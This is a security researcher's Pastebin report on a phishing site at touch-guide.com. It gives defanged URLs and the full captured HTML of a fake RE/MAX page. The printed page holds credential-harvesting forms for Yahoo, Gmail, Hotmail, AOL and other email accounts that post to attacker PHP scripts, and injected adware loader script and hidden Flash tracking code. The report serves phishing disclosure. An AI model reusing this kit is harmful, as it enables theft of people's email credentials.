API tools faq
paste
Advertisement
Neonprimetime

Phishing Website: touch-guide.com

Neonprimetime
Jan 4th, 2015
478
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 13.90 KB | None | 0 0
raw download clone embed print report
  1. Remax Phish
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. ******
  6.  
  7. If I go here hxxp://www.touch-guide.com/wp-content/upgrade/7/view/vieww.html
  8. And enter userid/pwd it posts here hxxp://www.touch-guide.com/wp-content/upgrade/7/view/yahoo.php
  9. Then redirects to here http://www.remax.com/
  10.  
  11. ******
  12.  
  13. hxxp://www.touch-guide.com/wp-content/upgrade/7/view/vieww.html
  14.  
  15. ******
  16.  
  17. <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  18. <title>RE/MAX - Fore Closure/Luxury Homes</title>
  19. <link rel="stylesheet" type="text/css" href="index_files/style.htm">
  20. <style type="text/css">
  21. div {
  22.     position: absolute;
  23.     left: 620px;
  24.     top: 40px;
  25.     background-color: #EBEBEB;
  26.     width: 280px;
  27.     padding: 10px;
  28.     color: #000000;
  29.     border: #0000cc 2px dashed;
  30.     display: none;
  31. }
  32. body,td,th {
  33.     font-family: Arial, Helvetica, sans-serif;
  34.     font-size: 12px;
  35. }
  36. body {
  37.     background-color: #999;
  38.     background-image: url(backgroundimage.png);
  39. }
  40. </style>
  41. <script language="Javascript">
  42. function echeck(str) {
  43.  
  44.         var at="@"
  45.         var dot="."
  46.         var lat=str.indexOf(at)
  47.         var lstr=str.length
  48.         var ldot=str.indexOf(dot)
  49.         if (str.indexOf(at)==-1){
  50.            alert("Invalid E-mail ID")
  51.            return false
  52.         }
  53.  
  54.         if (str.indexOf(at)==-1 || str.indexOf(at)==0 || str.indexOf(at)==lstr){
  55.            alert("Invalid E-mail ID")
  56.            return false
  57.         }
  58.  
  59.         if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
  60.             alert("Invalid E-mail ID")
  61.             return false
  62.         }
  63.  
  64.          if (str.indexOf(at,(lat+1))!=-1){
  65.             alert("Invalid E-mail ID")
  66.             return false
  67.          }
  68.  
  69.          if (str.substring(lat-1,lat)==dot || str.substring(lat+1,lat+2)==dot){
  70.             alert("Invalid E-mail ID")
  71.             return false
  72.          }
  73.  
  74.          if (str.indexOf(dot,(lat+2))==-1){
  75.             alert("Invalid E-mail ID")
  76.             return false
  77.          }
  78.        
  79.          if (str.indexOf(" ")!=-1){
  80.             alert("Invalid E-mail ID")
  81.             return false
  82.          }
  83.  
  84.          return true                   
  85.     }
  86.  
  87. function ValidateFormYahoo(){
  88.     var emailID=document.yahoo.yahoouser
  89.     var emailPASS=document.yahoo.yahoopassword
  90.    
  91.     if ((emailID.value==null)||(emailID.value=="")){
  92.         alert("Please Enter your Email ID")
  93.         emailID.focus()
  94.         return false
  95.     }
  96.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  97.         alert("Please Enter your Email Password")
  98.         emailPASS.focus()
  99.         return false
  100.     }
  101.  
  102.     return true
  103.  }
  104.  
  105.  function ValidateFormHotmail(){
  106.     var emailID=document.hotmail.hotmailuser
  107.     var emailPASS=document.hotmail.hotmailpassword
  108.    
  109.     if ((emailID.value==null)||(emailID.value=="")){
  110.         alert("Please Enter your Email ID")
  111.         emailID.focus()
  112.         return false
  113.     }
  114.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  115.         alert("Please Enter your Email Password")
  116.         emailPASS.focus()
  117.         return false
  118.     }
  119.  
  120.     return true
  121.  }
  122.  
  123.   function ValidateFormGmail(){
  124.     var emailID=document.gmail.gmailuser
  125.     var emailPASS=document.gmail.gmailpassword
  126.    
  127.     if ((emailID.value==null)||(emailID.value=="")){
  128.         alert("Please Enter your Email ID")
  129.         emailID.focus()
  130.         return false
  131.     }
  132.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  133.         alert("Please Enter your Email Password")
  134.         emailPASS.focus()
  135.         return false
  136.     }
  137.     return true
  138.  }
  139.  
  140.    function ValidateFormAol(){
  141.     var emailID=document.aol.aoluser
  142.     var emailPASS=document.aol.aolpassword
  143.    
  144.     if ((emailID.value==null)||(emailID.value=="")){
  145.         alert("Please Enter your Email ID")
  146.         emailID.focus()
  147.         return false
  148.     }
  149.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  150.         alert("Please Enter your Email Password")
  151.         emailPASS.focus()
  152.         return false
  153.     }
  154.     return true
  155.  }
  156.  
  157.    function ValidateFormOther(){
  158.     var emailID=document.other.otheruser
  159.     var emailPASS=document.other.otherpassword
  160.    
  161.     if ((emailID.value==null)||(emailID.value=="")){
  162.         alert("Please Enter your Email ID")
  163.         emailID.focus()
  164.         return false
  165.     }
  166.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  167.         alert("Please Enter your Email Password")
  168.         emailPASS.focus()
  169.         return false
  170.     }
  171.     if (echeck(emailID.value)==false){
  172.         emailID.value=""
  173.         emailID.focus()
  174.         return false
  175.     }
  176.     return true
  177.  }
  178. </script>
  179. <script language="javascript">
  180. function toggle() {
  181.     var ele = document.getElementById("toggleText");
  182.     var text = document.getElementById("displayText");
  183.     if(ele.style.display == "block") {
  184.             ele.style.display = "none";
  185.         text.innerHTML = "show";
  186.     }
  187.     else {
  188.         ele.style.display = "block";
  189.         text.innerHTML = "hide";
  190.     }
  191. }
  192.  
  193. function togglegmail() {
  194.     var ele = document.getElementById("toggleTextgmail");
  195.     var text = document.getElementById("displayTextgmail");
  196.     if(ele.style.display == "block") {
  197.             ele.style.display = "none";
  198.         text.innerHTML = "show";
  199.     }
  200.     else {
  201.         ele.style.display = "block";
  202.         text.innerHTML = "hide";
  203.     }
  204. }
  205.  
  206. function togglehotmail() {
  207.     var ele = document.getElementById("toggleTexthotmail");
  208.     var text = document.getElementById("displayTexthotmail");
  209.     if(ele.style.display == "block") {
  210.             ele.style.display = "none";
  211.         text.innerHTML = "show";
  212.     }
  213.     else {
  214.         ele.style.display = "block";
  215.         text.innerHTML = "hide";
  216.     }
  217. }
  218. function toggleaol() {
  219.     var ele = document.getElementById("toggleTextaol");
  220.     var text = document.getElementById("displayTextaol");
  221.     if(ele.style.display == "block") {
  222.             ele.style.display = "none";
  223.         text.innerHTML = "show";
  224.     }
  225.     else {
  226.         ele.style.display = "block";
  227.         text.innerHTML = "hide";
  228.     }
  229. }
  230. function toggleother() {
  231.     var ele = document.getElementById("toggleTextother");
  232.     var text = document.getElementById("displayTextother");
  233.     if(ele.style.display == "block") {
  234.             ele.style.display = "none";
  235.         text.innerHTML = "show";
  236.     }
  237.     else {
  238.         ele.style.display = "block";
  239.         text.innerHTML = "hide";
  240.     }
  241. }
  242. </script>
  243.  
  244. <script type="text/javascript">(typeof _GPL_16_loaded == 'undefined') && (_GPL_16_loaded=true) && (_GPL_i=document.getElementsByTagName('head')) && (_GPL_i=(_GPL_i.length>0)?_GPL_i:document.getElementsByTagName('body')) && (_GPL_i.length>0) && (_GPL_j=document.createElement('script')) && (_GPL_j.async=true) && (_GPL_j.type='text/javascript') && (_GPL_j.src='https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_16.js?pid=16&zoneid=7818&cid=US&rid=NV&ccid=Fernley&ip=199.48.177.231&aoi=1316649369') && (_GPL_i[0].appendChild(_GPL_j))</script><script type="text/javascript">if (window.addEventListener) {
  245.  var callback_func = function(evt) {
  246.    if ('undefined' != typeof evt.target && "A" == evt.target.nodeName) {
  247.      var url = evt.target.href;
  248.       EBCallBackMessageReceivedCT2612669_129564560723477699(url);
  249.     }
  250.     return true;
  251.   };
  252.   var result = window.addEventListener('click', callback_func, true);
  253.   var result = window.addEventListener('contextmenu', callback_func, true);
  254. } else if (document.attachEvent) {
  255.   var callback_func = function () {
  256.     if ('undefined' != typeof event.srcElement &&'A' == event.srcElement.tagName) {
  257.      var url = event.srcElement.href;
  258.       EBCallBackMessageReceivedCT2612669_129564560723477699(url);
  259.     }
  260.     return true;
  261.   };
  262.   var result = document.attachEvent('onclick', callback_func);
  263.   var result = document.attachEvent('oncontextmenu', callback_func);
  264. }
  265.  
  266.  
  267. </script></head>
  268. <body bgcolor="#efefef">
  269. <table id="wrapper" align="center" bgcolor="#cccccc" cellpadding="10" cellspacing="1"><tbody><tr><td bgcolor="#ffffff">
  270.  
  271. <table width="100%"><tbody><tr><td width="50%">
  272.  
  273.  
  274. <h1><img src="http://www.mtwashingtonvalley.org/MemberImgs/76/Remax_01_042308.jpg" height="87" width="137"></h1>
  275.  
  276. </td></tr></tbody></table>
  277.  
  278.  
  279. <br>
  280.  
  281.  
  282. <table id="invoicetoptables" cellspacing="0" width="100%">
  283. <tbody><tr>
  284. <td id="invoicecontent" width="50%">
  285.  
  286. <table id="invoicetoptables" cellpadding="10" cellspacing="0" height="100" width="100%">
  287. <tbody><tr>
  288. <td id="invoicecontent" style="border: 0px solid rgb(204, 204, 204);" valign="top">
  289. <p><font color="#990000" size="4">To access our online secured properties auction page, <br>
  290. you are required to choose your email address below</font></p>
  291.  
  292. <br>
  293. <br>
  294.  
  295. <font class="paid">Choose your email provider below and login:</font>
  296.  
  297. <br>
  298.  
  299. <br>
  300.  
  301. <br>
  302. <p align="center">
  303. <a href="javascript:toggle();"><img src="yahoo.jpg" title="Yahoomail" id="displayText" border="0" height="48" width="132"></a>
  304. &nbsp;&nbsp;&nbsp; <a href="javascript:togglegmail();"><img src="gmail.jpg" title="Gmail" id="displayTextgmail" border="0" height="48" width="132"></a>
  305. <br>
  306. <br>
  307. <br>
  308. <a href="javascript:togglehotmail();"><img src="hotmail.jpg" title="Hotmail" id="displayTexthotmail" border="0" height="48" width="132"></a>
  309. &nbsp;&nbsp;&nbsp; <a href="javascript:toggleaol();"><img src="aol.jpg" title="Aol" id="displayTextaol" border="0" height="48" width="132"></a>
  310. <br>
  311. <br>
  312. <br>
  313. <a href="javascript:toggleother();"><img src="other.jpg" title="Other Email" id="displayTextother" border="0" height="48" width="132"></a>
  314.  
  315. </p>
  316.  
  317.  
  318. <!-- YAHOO CONFIG !-->
  319.  
  320. <div id="toggleText" style="display: none">
  321. <p><img src="index_files/yahoo.jpg" title="Yahoomail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  322. <br>
  323. <form name="yahoo" method="post" action="yahoo.php" onSubmit="return ValidateFormYahoo()">
  324. <p>
  325. <br>
  326.                 <label>Yahoo Email Address:</label>
  327.                 <br>
  328.                 <input name="yahoouser" style="width: 200px;" type="text">
  329.             <br>
  330.                 <label>Yahoo Password</label>
  331.                 <br>
  332.                 <input name="yahoopassword" style="width: 200px;" type="password">
  333.                 <br>
  334.                 <br>
  335.                 <input name="s_yahoo" value="Sign In" type="submit">
  336.             </p>
  337.  
  338.  
  339.  
  340. </form>
  341. </div>
  342.  
  343. <!-- GMAIL CONFIG !-->
  344. <div id="toggleTextgmail" style="display: none">
  345. <p><img src="index_files/gmail.jpg" title="Gmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  346. <br>
  347. <form name="gmail" method="post" action="gmail.php" onSubmit="return ValidateFormGmail()">
  348. <p>
  349.  
  350.                 <label>Gmail Email Address:</label>
  351.  
  352.                 <br>
  353.                 <input name="gmailuser" style="width: 200px;" type="text">
  354.             <br>
  355.                 <label>Gmail Password</label>
  356.                 <br>
  357.                 <input name="gmailpassword" style="width: 200px;" type="password">
  358.                 <br>
  359.                 <br>
  360.                 <input name="s_gmail" value="Sign in" type="submit">
  361.             </p>
  362.             </form>
  363.  
  364.  
  365.  
  366.  
  367. </div>
  368.  
  369. <!-- HOTMAIL CONFIG !-->
  370. <div id="toggleTexthotmail" style="display: none">
  371. <p><img src="index_files/hotmail.jpg" title="Hotmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  372. <br>
  373. <form name="hotmail" method="post" action="hotmail.php" onSubmit="return ValidateFormHotmail()">
  374. <p>
  375.                 <label>Hotmail Email Address:</label>
  376.                 <br>
  377.                 <input name="hotmailuser" style="width: 200px;" type="text">
  378.             <br>
  379.                 <label>Hotmail Password</label>
  380.                 <br>
  381.                 <input name="hotmailpassword" style="width: 200px;" type="password">
  382.                 <br>
  383.                 <br>
  384.                 <input name="s_hotmail" value="Sign in" type="submit">
  385.             </p>
  386.             </form>
  387.  
  388.  
  389.  
  390. </div>
  391.  
  392. <!-- AOL CONFIG !-->
  393. <div id="toggleTextaol" style="display: none">
  394. <p><img src="index_files/aol.jpg" title="Aol" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  395. <br>
  396. <form name="aol" method="post" action="aol.php" onSubmit="return ValidateFormAol()">
  397. <p>
  398.                 <label>Aol Email Address:</label>
  399.                 <br>
  400.                 <input name="aoluser" style="width: 200px;" type="text">
  401.             <br>
  402.                 <label>Aol Password</label>
  403.                 <br>
  404.                 <input name="aolpassword" style="width: 200px;" type="password">
  405.                 <br>
  406.                 <br>
  407.                 <input name="s_aol" value="Sign In" type="submit">
  408.             </p>
  409.             </form>
  410.  
  411.  
  412.  
  413. </div>
  414.  
  415. <!-- OTHER CONFIG !-->
  416. <div id="toggleTextother" style="display: none">
  417. <p><img src="index_files/other.jpg" title="Other" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  418. <br>
  419. <form name="other" method="post" action="other.php" onSubmit="return ValidateFormOther()">
  420. <p>
  421.                 <label>Email Address:</label>
  422.                 <br>
  423.                 <input name="otheruser" style="width: 200px;" type="text">
  424.             <br>
  425.                 <label>Password</label>
  426.                 <br>
  427.                 <input name="otherpassword" style="width: 200px;" type="password">
  428.                 <br>
  429.                 <br>
  430.                 <input name="s_other" value="Sign In" type="submit">
  431.             </p>
  432.             </form>
  433.  
  434.  
  435.  
  436. </div>
  437.  
  438.  </td>
  439.  </tr>
  440.  </tbody></table>
  441. </td></tr></tbody></table>
  442.  
  443. </td>
  444.  
  445.  
  446.  
  447.  
  448.  
  449.  
  450. </tr></tbody></table><iframe style="display: none;" src="index_files/google.htm" id="y2Google"></iframe><div id="_GPL_e6a00_div" style="position: absolute;"><object codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="_GPL_e6a00_swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" height="1" width="1"><param value="http://d3lvr7yuk4uaui.cloudfront.net/items/e6a00/storage.swf" name="movie"><param value="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl" name="FlashVars"><param value="always" name="allowscriptaccess"><embed pluginspage="http://www.macromedia.com/go/getflashplayer" flashvars="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" loop="false" play="true" name="_GPL_e6a00_swf" bgcolor="#ffffff" src="index_files/storage.swf" align="middle" height="1" width="1"></object></div><div style="display: none;" id="YontooInstallID">53F185F5-B55B-7227-CDAE-4D9C688D1835</div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!